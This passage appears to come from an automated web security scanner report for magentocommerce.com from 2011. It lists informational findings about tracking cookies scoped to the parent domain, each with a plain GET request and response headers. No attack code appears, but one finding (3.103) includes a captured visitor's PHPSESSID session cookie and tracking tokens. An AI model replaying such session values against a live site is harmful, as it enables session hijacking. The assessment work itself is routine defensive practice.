The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /media/screencasts/permissions/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:07:06 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176026; expires=Sat, 11-Aug-2012 15:07:06 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A36%3A%22%2Fmedia%2Fscreencasts%2Fpermissions%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:07:06 GMT
Content-Length: 35264

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
3.91. http://www.magentocommerce.com/media/screencasts/private-sales-including-events-invitations-and-category-access-permissions/view  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/private-sales-including-events-invitations-and-category-access-permissions/view

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /media/screencasts/private-sales-including-events-invitations-and-category-access-permissions/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:06:46 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176006; expires=Sat, 11-Aug-2012 15:06:46 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A99%3A%22%2Fmedia%2Fscreencasts%2Fprivate-sales-including-events-invitations-and-category-access-permissions%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:06:46 GMT
Content-Length: 33592

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
3.92. http://www.magentocommerce.com/media/screencasts/product-comparison/view  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/product-comparison/view

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /media/screencasts/product-comparison/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:07:38 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176058; expires=Sat, 11-Aug-2012 15:07:38 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A43%3A%22%2Fmedia%2Fscreencasts%2Fproduct-comparison%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:07:38 GMT
Content-Length: 33268

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
3.93. http://www.magentocommerce.com/media/screencasts/single-page-checkout-guest-checkout/view  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/single-page-checkout-guest-checkout/view

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /media/screencasts/single-page-checkout-guest-checkout/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:09:34 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176174; expires=Sat, 11-Aug-2012 15:09:34 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A60%3A%22%2Fmedia%2Fscreencasts%2Fsingle-page-checkout-guest-checkout%2Fview%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:09:34 GMT
Content-Length: 34173

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
3.94. http://www.magentocommerce.com/media/screencasts/static-blocks/view  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/static-blocks/view

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /media/screencasts/static-blocks/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:06:51 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176010; expires=Sat, 11-Aug-2012 15:06:50 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A38%3A%22%2Fmedia%2Fscreencasts%2Fstatic-blocks%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:06:51 GMT
Content-Length: 34297

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
3.95. http://www.magentocommerce.com/media/screencasts/transactional-email/view  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/transactional-email/view

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /media/screencasts/transactional-email/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:07:18 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176037; expires=Sat, 11-Aug-2012 15:07:17 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A44%3A%22%2Fmedia%2Fscreencasts%2Ftransactional-email%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:07:18 GMT
Content-Length: 34426

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
3.96. http://www.magentocommerce.com/media/screencasts/upsells/view  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/upsells/view

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /media/screencasts/upsells/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:09:25 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176165; expires=Sat, 11-Aug-2012 15:09:25 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A32%3A%22%2Fmedia%2Fscreencasts%2Fupsells%2Fview%2F%22%3Bi%3A1%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A2%3Bs%3A5%3A%22index%22%3Bi%3A3%3Bs%3A20%3A%22%2Fcompany%2Finthepress%2F%22%3Bi%3A4%3Bs%3A28%3A%22%2Fproduct%2Fdeployed-solutions%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:09:25 GMT
Content-Length: 33171

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
3.97. http://www.magentocommerce.com/media/screencasts/working-with-paypal/view  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/working-with-paypal/view

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /media/screencasts/working-with-paypal/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:07:16 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176036; expires=Sat, 11-Aug-2012 15:07:16 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A44%3A%22%2Fmedia%2Fscreencasts%2Fworking-with-paypal%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:07:16 GMT
Content-Length: 40839

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
3.98. http://www.magentocommerce.com/media/screenshots  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screenshots

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /media/screenshots HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:04:22 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175862; expires=Sat, 11-Aug-2012 15:04:22 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A19%3A%22%2Fmedia%2Fscreenshots%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:04:22 GMT
Content-Length: 36191

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
3.99. http://www.magentocommerce.com/media/videos  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/videos

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /media/videos HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:04:50 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175890; expires=Sat, 11-Aug-2012 15:04:50 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A14%3A%22%2Fmedia%2Fvideos%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:04:50 GMT
Content-Length: 37445

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
3.100. http://www.magentocommerce.com/media/videos/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/videos/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /media/videos/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:09:48 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176188; expires=Sat, 11-Aug-2012 15:09:48 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A14%3A%22%2Fmedia%2Fvideos%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:09:48 GMT
Content-Length: 37445

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
3.101. http://www.magentocommerce.com/media/webinars  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/webinars

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /media/webinars HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:04:30 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175869; expires=Sat, 11-Aug-2012 15:04:29 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A16%3A%22%2Fmedia%2Fwebinars%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:04:30 GMT
Content-Length: 178679

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
3.102. http://www.magentocommerce.com/media/webinars/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/webinars/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /media/webinars/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:04:54 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175893; expires=Sat, 11-Aug-2012 15:04:53 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A16%3A%22%2Fmedia%2Fwebinars%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:04:54 GMT
Content-Length: 178679

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
3.103. http://www.magentocommerce.com/partners/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /partners/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /partners/ HTTP/1.1
Host: www.magentocommerce.com
Proxy-Connection: keep-alive
Referer: http://www.magentocommerce.com/services/descriptions#core-principles-for-theming-in-magento
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=8gleaor858b1qbfp47t52qb1o1; guid=db13949594b1b3d2138f3212e370aacf; homepage_intro=1; exp_domain=c; exp_last_visit=997810899; exp_last_activity=1313170940; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A1%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3Bi%3A2%3Bs%3A23%3A%22%2Fservices%2Fdescriptions%2F%22%3Bi%3A3%3Bs%3A19%3A%22%2Fservices%2Ftraining%2F%22%3Bi%3A4%3Bs%3A19%3A%22%2Fmedia%2Fscreencasts%2F%22%3B%7D; __utma=94789760.769027909.1313156482.1313156482.1313156482.1; __utmb=94789760.9.10.1313156482; __utmc=94789760; __utmz=94789760.1313156482.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _mkto_trk=id:397-EXO-877&token:_mch-magentocommerce.com-1313156482005-48894

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 13:44:12 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313171052; expires=Sat, 11-Aug-2012 13:44:12 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A1%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A2%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3Bi%3A3%3Bs%3A23%3A%22%2Fservices%2Fdescriptions%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 13:44:12 GMT
Content-Length: 38025

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
3.104. http://www.magentocommerce.com/partners/find/bronze-solution/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /partners/find/bronze-solution/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /partners/find/bronze-solution/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:12:22 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176342; expires=Sat, 11-Aug-2012 15:12:22 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A31%3A%22%2Fpartners%2Ffind%2Fbronze-solution%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:12:22 GMT
Content-Length: 65854

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
3.105. http://www.magentocommerce.com/partners/find/hosting-partners/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /partners/find/hosting-partners/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /partners/find/hosting-partners/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
